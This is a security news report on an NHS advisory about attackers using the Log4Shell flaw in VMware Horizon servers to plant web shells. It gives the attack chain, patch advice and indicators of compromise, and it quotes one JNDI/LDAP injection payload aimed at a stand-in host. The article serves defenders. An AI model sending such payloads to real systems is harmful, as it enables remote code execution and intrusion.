UK National Health Service (NHS) was reportedly found compromised following the detection of Log4Shell vulnerability at their VMWare Horizon servers, actively exploited by unidentified threat actors to install web shells for deploying across the public infrastructure.

The security team at UK NHS has recently released a security advisory highlighting that ” Threat actors are targeting VMware Horizon servers running on Apache Log4j 2.14, in establishing persistence within affected networks. While threat actors are aiming to leverage web shell in order to execute multiple malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware"

VMWare products remain targeted for the second time by Log4Shell vulnerabilities following the instances of Conti ransomware groups exploiting to compromise VMWare Centre servers. Tracked as CVE-2021-44228, the infamous Log4Shell vulnerability was detected in the Apache Log4j 2.14 Java-based logging library as a critical arbitrary remote code execution flaw that has remained hyperactive on numerous exploits since December 2021. First discovered with a Proof-of-Concept by p0rz9, a Chinese web security engineer.

***"The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back to malicious infrastructure. As soon as a loophole has been identified, threat actors use the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file injecting a web shell into the VM Blast Secure Gateway service."

###Apache Tomcat under the main target via VMWare Horizon servers

While Apache Tomcat was primarily intended by the threat actors to be targeted as it's also vulnerable to Log4Shell embedded within VMWare Horizon.

Threat actors execute "${jndi:ldap://example.com}" payload and spawn the PowerShell command from Tomcat as the first step towards exploitation, which invokes a win32 service to obtain a list of VMBlastSG service names, retrieve paths, modify 'absg-worker.js' to drop a listener, & restart the service to activate the implant. This follows in executing arbitrary commands received via HTTP/HTTPS as header objects with a hardcoded string held responsible by the listeners.

If successfully done, it can lead to establishing continuous and stable communication with the C2 server and also performs data exfiltration, command execution, or deploy ransomware.

###Available Security Patches for VMWare Products

VMWare Horizon, along with other VMWare products, has already received a security update last month patching CVE-2021-45046 and CVE-2021-44228 through with versions 2111, 7.13.1, & 7.10.3. However, lately, VMWare Horizon admins were strictly advised to update their systems with all the respective security patches.

As such, all VMware Horizon admins are urged to apply the security updates as soon as possible.

UK National Health Services have highlighted three key points in the report as a sign of confirmed exploitation on vulnerable systems:

-Evidence of ws_TomcatService.exe spawning abnormal processes. -Any powershell.exe processes contain VMBlastSG in the command line. -File modifications to '…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js' - This file is generally overwritten during upgrades and not modified.